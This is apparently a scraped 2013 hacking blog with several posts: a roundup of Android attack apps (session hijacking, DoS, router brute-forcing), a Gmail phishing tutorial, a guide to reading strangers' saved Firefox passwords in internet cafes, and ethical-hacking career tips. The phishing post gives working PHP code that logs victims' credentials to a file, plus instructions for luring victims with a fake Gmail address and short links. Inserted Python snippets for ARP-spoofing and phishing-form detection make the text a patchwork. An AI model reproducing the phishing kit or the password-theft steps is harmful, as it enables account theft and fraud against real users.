Thursday, 31 October 2013

How to use droidsheep

Using DroidSheep is really simple

DroidSheep's main intention is to demonstrate how EASY it can be to take over nearly any internet account. Using DroidSheep, any user, even one without technical experience, can check whether his web session can be attacked or not. For these users it is hard to determine whether the data is sent using HTTPS or not, especially when using apps. DroidSheep makes it easy to check this.

Hackers app for android users

Nowadays, smartphones and tablets are the most popular gadgets. If we look at recent stats, global PC sales have also been decreasing for the past few months. The reason behind this is that people use tablets for most of their work. And there is no need to explain that Android is ruling the global smartphone and tablet markets. Android is the most popular mobile OS, with more than 60% market share.

So, companies are now focusing on bringing their software to Android as mobile apps. These apps include office apps, photo editing apps, instant messaging apps and penetration testing apps. If you have an Android smartphone, you can start your next penetration testing project from your Android phone. There are a few Android apps that can turn your Android device into a hacking device. However, these apps have many limitations and can only be used for a few specific tasks. You can never get the same experience as you get with your PC, but smaller jobs can be performed. Apps for penetration testers are not widely available, but hackers can enjoy this platform in a better way. There are many Wi-Fi hacking and sniffing apps available.

As we already said, Android is ruling the smartphone and tablet markets, so developers are also creating more apps for Android devices. This is the reason why the Android market has millions of apps. Like websites, apps also need penetration testing to check for various vulnerabilities. Security testing of Android apps requires a penetration testing environment on your Android device.

Note:

1. These apps are not for beginners, because expertise is needed on the Android platform.
2. Most of the apps work on rooted Android devices, so root your Android device first. If you are not sure how to do it, learn how by reading one of the many sites available to help with this process.
3. You will lose your device's warranty if you root it, so think twice before proceeding.
4. These apps can also harm your Android device, so please try these apps at your own risk.

In this detailed post, we will see various apps for web application penetration testing, network penetration testing, sniffing, networking hacking and Android apps penetration testing.

Android apps for Penetration testing

1. dSploit

dSploit is a nice Android network penetration testing suite. It comes with all-in-one network analysis capabilities. Like most of the other penetration testing tools, it is free. So, you can download and use this app on your Android device and perform network security testing. It has various pre-compiled modules to use. The app is designed to be very fast, handy and easy to use; it's just point and click.

dSploit supports all Android devices running Android 2.3 Gingerbread or higher, and you also need to root your device. If you are a newbie and don't know how to root your Android device, we do not recommend that you use the app. After rooting your device, you need to install BusyBox Installer. Download BusyBox from Google Play Store: https://play.google.com/store/apps/details?id=com.jrummy.busybox.installer&hl=en

Then download the app from the link given below.

App is available on github: https://github.com/evilsocket/dsploit/downloads

These are the available modules in the app.

1. RouterPWN
2. Trace
3. Port Scanner
4. Inspector
5. Vulnerability Finder
6. Login Cracker
7. Packet Forger
8. MITM

2. Network Spoofer

Network Spoofer is another nice app that lets you change websites on other people's computers from your Android phone. Download the Network Spoofer app and then log onto the Wi-Fi network. Choose a spoof to use with the app, then tap on start. This app is considered a malicious hacking tool by network administrators. So, don't try it on unauthorized networks. This is not a penetration testing app. It's just to demonstrate how vulnerable the home network is.

Download this app from sourceforge http://sourceforge.net/projects/netspoof/

3. Network Discovery

Network Discovery is a free app for the Android device. The good thing is that the app doesn’t need a rooted device. This app has a simple and easy to use interface. It views all the networks and devices connected to your Wi-Fi network. The application identifies the OS and manufacturer of the device. Thus the app helps in information gathering on the connected Wi-Fi network.

Download app from Google Play: https://play.google.com/store/apps/details?id=info.lamatricexiste.network

4. Shark for Root

Shark for Root is a nice traffic sniffer app for Android devices. It works fine on both 3G and Wi-Fi connections. You can view the dump on the phone by using Shark Reader, which comes with the app. You can also use Wireshark, a similar tool, to open the dump on a computer. So, start sniffing data on your Android device and see what others are doing.

5. Penetrate Pro

Penetrate Pro is a nice Android app for Wi-Fi decoding. The latest version of the app has added many nice features. It can calculate the WEP/WPA keys for some wireless routers. If you have installed an antivirus app, it may detect the Penetrate Pro app as a virus. But this app is a security tool and it will not affect or harm your device.

Penetrate gives you the wireless keys of Discus, Thomson, Infinitum, BBox, Orange, DMax, SpeedTouch, DLink, BigPond, O2Wireless and Eircom routers.

6. DroidSheep [Root]

DroidSheep is a session hijacking tool for Android devices. This is an app for security analysis in wireless networks. It can easily capture Facebook, Twitter, LinkedIn, Gmail or other website accounts. You can hijack any active web account on your network with just a tap by using the DroidSheep app.

This app demonstrates the harm of using any public Wi-Fi.

Download this app from here: http://droidsheep.de/?page_id=23

7. DroidSheep Guard

DroidSheep Guard is another Android app from the developer of DroidSheep. This app does not require a rooted device. It monitors the Android device's ARP table and tries to detect ARP spoofing attacks on the network performed by DroidSheep, FaceNiff and other software.

Download DroidSheep Guard from Google Play: https://play.google.com/store/apps/details?id=de.trier.infsec.koch.droidsheep.guard.free&feature=search_result
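The ARP-table monitoring described above can be sketched as follows. This is an added example, not DroidSheep Guard's own code: it assumes the Linux `/proc/net/arp` text layout, a gateway at 192.168.1.1, and two constructed snapshots of the table.

```python
from collections import defaultdict

# Constructed snapshots in the Linux /proc/net/arp layout (not real captures).
ARP_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        wlan0
192.168.1.23     0x1         0x2         a4:5e:60:aa:bb:cc     *        wlan0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

ARP_AFTER = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         a4:5e:60:aa:bb:cc     *        wlan0
192.168.1.23     0x1         0x2         a4:5e:60:aa:bb:cc     *        wlan0
"""


def parse_arp_table(text):
    """Return {ip: mac} for completed ARP entries, skipping the header row."""
    entries = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hw_type, flags, mac = fields[:4]
        # Flag bit 0x2 marks a completed entry; incomplete ones carry no MAC.
        if not (int(flags, 16) & 0x2) or mac == "00:00:00:00:00:00":
            continue
        entries[ip] = mac.lower()
    return entries


def find_arp_anomalies(baseline, current, gateway_ip):
    """Compare two parsed tables and report signs of ARP spoofing."""
    alerts = []
    old_mac = baseline.get(gateway_ip)
    new_mac = current.get(gateway_ip)
    # 1. The gateway's MAC changed since the trusted baseline was taken.
    if old_mac and new_mac and old_mac != new_mac:
        alerts.append(("gateway-mac-changed", gateway_ip, old_mac, new_mac))
    # 2. Another host's IP resolves to the same MAC as the gateway.
    ips_by_mac = defaultdict(list)
    for ip, mac in current.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1 and gateway_ip in ips:
            alerts.append(("mac-shared-with-gateway", mac, sorted(ips)))
    return alerts


if __name__ == "__main__":
    baseline = parse_arp_table(ARP_BEFORE)
    current = parse_arp_table(ARP_AFTER)
    for alert in find_arp_anomalies(baseline, current, "192.168.1.1"):
        print(alert)
```

The baseline must be taken on a network state you trust; a table that is already poisoned when first read only triggers the second check.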

8. WPScan

WPScan is a WordPress vulnerability scanner for Android devices. This nice app is used to scan a WordPress-based website and find all the security vulnerabilities it has. WPScan also has a desktop version that is much more powerful than the Android app. We know that WordPress is one of the most popular CMSs and is being used by millions of websites.

The Android version of the app comes with a few nice features. The app was released on Google Play, but Google removed it. The full source code of the app is available from GitHub. One thing to note is that the WPScan Android app is not related to the desktop version of WPScan. So, never think of it as an official WPScan app.

Download app and source code: https://github.com/clshack/WPScan

9. Nessus

Nessus is a popular penetration testing tool that is used to perform vulnerability scans with its client/server architecture. It also released a mobile app to bring its power to mobile devices. The Nessus Android app can perform the following tasks:

- Connect to a Nessus server (4.2 or greater)
- Launch existing scans on the server
- Start, stop or pause running scans
- Create and execute new scans and scan templates
- View and filter reports

This app was released on the Google Play store almost 2 years back by Tenable Network Security. Later, Google removed the app from the Play store, and the official link is now gone. You can try download links available on third-party websites, but be careful and check the app first.

10. FaceNiff

FaceNiff is another nice sniffing app for Android devices. It requires a rooted Android device. It can sniff and intercept web sessions over Wi-Fi. This app is similar to DroidSheep, covered earlier in the post. You could call it Firesheep for Android devices. Use of this app may be illegal in your area. So, use it wisely.

11. WebSecurify

WebSecurify is a powerful web vulnerability scanner. It's available for all popular desktop and mobile platforms. It has a powerful crawler to crawl websites and then attack them using pre-defined patterns. We have already covered it in detail in our previous article. You can read the older article for a better understanding.

Download it here: https://code.google.com/p/websecurify/

12. Network Mapper

Network Mapper is a fast scanner for network admins. It can easily scan your network and export the report as CSV to your Gmail. It lists all devices in your LAN along with details. Generally, the app is used to find open ports of various servers, such as FTP servers, SSH servers and SMB servers, on your network. The tool works really fast and gives effective results.

Download Network Mapper from Google Play Store: https://play.google.com/store/apps/details?id=org.prowl.networkmapper&hl=en

13. Router Bruteforce ADS 2

If you are connected to a Wi-Fi network and you want to access the router of the network, you can use the Router Bruteforce ADS 2 app. This app performs a brute-force attack to get the valid password of the router. It has a list of default passwords that it tries on the router. Most of the time, the app cracks the password. But you cannot be 100% sure with a brute-force attack.

It comes with a sample txt file which contains 398 default passwords used in different routers. You can add more passwords to the list. But there is one limitation: the app only works with a dictionary file of less than 5 MB. Also, try it only when you have a good Wi-Fi signal. This is an experimental app and the developer also warns users to try it at their own risk.

Download Router Bruteforce ADS 2 from Google Play: https://play.google.com/store/apps/details?id=evz.android.rbf_ads&hl=en

14. AnDOSid

AnDOSid is another nice application that can be used to perform DOS attacks from Android mobile phones. It is like the LOIC tool for desktop. In the app, you can set the target URL, payload size and time difference between two requests. After that, click on the big GO button to launch a DOS attack on a website. It will start flooding the target URL with fake requests. Use this app if you have a powerful device. Avoid it if you have a low-cost, entry-level device.

15. AppUse – Android Pentest Platform Unified Standalone Environment

AppUse Virtual Machine is developed by AppSec Labs. It’s a freely available mobile application security testing platform for Android apps. This android penetration testing platform contains custom made tools by AppSec Labs.

This penetration testing platform is for those who are going to start penetration testing of Android applications. All you need to do is download the AppUse Virtual Machine and then load the app for testing. It comes with most of the configuration done, so you do not need to install simulators or testing tools, and there is no need for SSL certifications of Proxy. Thus, the tool gives an ideal user experience. In other words, you can say that AppUse Virtual Machine is Backtrack for Android apps. As the world is moving towards apps, AppUse VM has good scope in the future. We see how Android users face attacks, and these cyber-attacks are growing. So, it is important for all Android app developers to test their apps for various kinds of vulnerabilities.

Download AppUse Virtual machine Here http://sourceforge.net/projects/appuse-android-pentest/files/AppUse%201.6_release.rar/download

Conclusion

Android is one of the fastest growing mobile platforms, with the biggest market share. People also claim that it could replace desktop OSes as well. Although we do not agree with that, we cannot ignore its importance. This is why developers are bringing their tools to the Android platform too. In this post, I have listed a few Android apps for hackers and security researchers. You can say that these apps are not as powerful as desktop hacking tools. But you can still enjoy these hacking tools for most of your tasks. Most of the hacking apps are related to networking and spoofing, and all of them do this over Wi-Fi. A few web scanners are also available that let security researchers find vulnerabilities in web applications.

You can also launch DOS attack on a website direct from your smartphone or tablet. This could be a better hacking tool.

If you are into the security field, you can try these apps and see how these work.

How to hack Gmail accounts

HOW TO CREATE A PHISHING OR FAKE WEBPAGE FOR GMAIL
This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:

Go to the gmail.com. Save the Page as "complet HTML" file

Step 2: Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3: Upload those image to tinypic or photobucker.com. copy the url of each image.

Step4: Open the HTML file in Wordpad. Search for "google_transparent.gif" (without quotes) and replace it with corresponding url . Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5: Search for the

action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

save the file. Step6: Now you need to create login.php so you need to open the notepad and type as <?php header("Location: https://www.google.com/accounts/ServiceLoginAuth "); $handle = fopen("pswrds.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> save it

Step 7: open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site. Note: that web hosting service must has php feature. Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.

Step 8: create an email with gmail keyword. like : gmailburger@gmail.com

Step 9: Send to victim similar to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.

Note: For user to believe change Your phishing web page url with any of free short url sites. Like : co.nr, co.cc,cz.cc This will make users to believe that it is
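From the defending side, the copied page in the steps above gives itself away by where its login form posts. The check below is an added example, not part of the original post: it flags password forms whose action is not HTTPS or not on an expected host. The trusted host list, the lookalike page URL and the `example.test` form target are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hosts the real login form is expected to post to (assumed for this example).
TRUSTED_HOSTS = {"www.google.com", "accounts.google.com"}

# Constructed sample pages: the genuine form target quoted in the post,
# and a copy whose action was pointed at a third-party script.
GENUINE_PAGE = """
<form action="https://www.google.com/accounts/ServiceLoginAuth" method="post">
  <input type="text" name="Email"><input type="password" name="Passwd">
</form>"""

TAMPERED_PAGE = """
<form id="search" action="/search"><input type="text" name="q"></form>
<form action="http://phish.example.test/login.php" method="post">
  <input type="text" name="Email"><input type="PASSWORD" name="Passwd"/>
</form>"""


class FormCollector(HTMLParser):
    """Collect each <form> with its action and whether it has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open_form = None

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "form":
            self._open_form = {"action": attr.get("action") or "",
                               "has_password": False}
            self.forms.append(self._open_form)
        elif tag == "input" and self._open_form is not None:
            if (attr.get("type") or "").lower() == "password":
                self._open_form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open_form = None


def audit_login_forms(html, page_url, trusted_hosts):
    """Return findings for password forms that post off-host or without TLS."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        # An empty or relative action resolves against the page's own URL.
        target = urlsplit(urljoin(page_url, form["action"]))
        reasons = []
        if target.scheme != "https":
            reasons.append("credentials posted without TLS")
        if (target.hostname or "").lower() not in trusted_hosts:
            reasons.append("form posts to untrusted host")
        if reasons:
            findings.append({"action": target.geturl(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    print(audit_login_forms(TAMPERED_PAGE,
                            "http://gmail-login.example.test/index.html",
                            TRUSTED_HOSTS))
```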

How to view saved password in mozilla

Here is a simple hacking tutorial on viewing the saved passwords in Mozilla Firefox. While visiting a public internet cafe, some innocent people click "Remember" when Mozilla asks whether to remember the password. This is a benefit for us, letting us hack their account in a very simple way.

Follow these steps to see the saved Passwords:

- Click the "Tools" menu in the menu bar.
- Select Options.
- It will open a small window.
- Select the "Security" tab in that small window.
- You can view the "Saved Passwords" button.
- Click that button. It will open another small window.
- There will be a list of sites with usernames.
- Select one site and click "Show Password".
- It will clearly show you the password.

TIPS ON HOW TO BECOME AN ETHICAL HACKER

I have been asked via email for tips on becoming an Ethical Hacker or Penetration Tester. So in this article, I am going to guide you into the Penetration Testing world.

If you are reading this article, then it means that you have already heard about Ethical Hacking and PenTesting. Anyway, I would just like to give a small definition of Ethical Hacking.

What is Ethical Hacking and Ethical Hacker?
Ethical Hacking, also known as Penetration Testing, is the process of vulnerability testing or hacking a system with permission from the corresponding vendor. Normally, organizations that are in need of security recruit an Ethical Hacker or PenTester to improve their security.

Ok, let us come to the article.

1. Dedication: Dedication is the main key to becoming an ethical hacker. Don't plan to become a pentester because of money. If you really have an interest, then go ahead.
2. Reading: Be a bookworm. Try to read books related to computers and their architecture. Buy books related to security and ethical hacking.
3. Know how hackers hack into systems: You cannot solve the problem until you know what is behind the problem. So you have to learn the methods of hackers. How?! Just read the articles provided on our site.
4. Programming and Scripting: Learn some programming or scripting languages, because most of the time you will need to write code to break into a system. Also, you have to know coding to understand how a system works; only then can you penetrate it. OK, which language?! My suggestion is C. I love C programming. It is one of the best, most powerful languages and easy to learn. Some people prefer Python. As far as I am concerned, once you have learned one language, it is easy for you to learn any other language. There are plenty of online programming tutorial sites out there.
5. Linux: OK, it is time to switch from Windows to Linux. Learn to work with Linux.
6. BackTrack Linux Distribution: BackTrack Linux is one of the famous penetration testing Linux distributions. BackTrack is funded by Offensive Security. It has almost all the penetration testing tools required by security professionals.
7. Get Certification for Ethical Hackers: Some organizations recruit based on security certifications. You can learn and get an ethical hacking certification from your nearest center. Search in Google for these keywords: "CEH", "OSCP", "security certifications". Anyway, if you have dedication and confidence, you don't need a certificate and can get into a firm easily.
8. Vercetti's blog: In my blog, I have written plenty of articles related to ethical hacking and penetration testing. I hope it will help you to gain some knowledge. Also, you can find the latest ethical hacking techniques in my blog.
9. Forums: Participate in any security or ethical hacking related forums.
10. Need help?! Feel free to contact me.

Opportunities for Ethical Hacker

There are plenty of jobs available in government organisations, banks, financial institutions, military establishments and private companies. India requires more Ethical Hackers.

Introduction To Hacking|What is computer hacking?

What is computer hacking?
In the cyber security world, a person who is able to discover a weakness in a system and manages to exploit it to accomplish his goal is referred to as a Hacker, and the process is referred to as Hacking.

Nowadays, people have started thinking that hacking is only hijacking Facebook accounts or defacing websites. Yes, that is also part of the hacking field, but it doesn't mean that it is the main part of hacking.

So what exactly is hacking, and what should I do to become a hacker?! Don't worry, you will learn it from Vercetti's blog. The main thing you need to become a hacker is self-interest. You should always be ready to learn something and learn to create something new.

Now, let me explain the different kinds of hackers in the cyber security world.
SCRIPT KIDDIES
Script kiddies are people who use tools, scripts, methods and programs created by real hackers. In simple words, a script kiddie is someone who doesn't know how a system works but is still able to exploit it with previously available tools.

WHITE HAT HACKER
White hat hackers are good guys who do hacking for defensive purposes. The main aim of a white hat hacker is to improve the security of a system by finding security flaws and fixing them. They work for an organization or individually to make cyberspace more secure.

Vercetti's blog concentrates only on white-hat hacking and helps you to learn the Ethical Hacking world.
BLACKHAT HACKER
Blackhat hackers are bad guys, cyber criminals, who have malicious intent. Hackers who steal money, infect systems with malware, etc. are referred to as blackhat hackers. They use their hacking skills for illegal purposes.
GREYHAT HACKERS
Greyhat hackers may work offensively or defensively, depending on the situation. They don't have malicious intentions but still like to break into third-party systems for fun or just to show the existence of a vulnerability.
HACKTIVISTS
Hacktivists use their hacking skills to protest against injustice, attacking target systems and websites to bring justice. One of the popular hacktivist groups is Anonymous.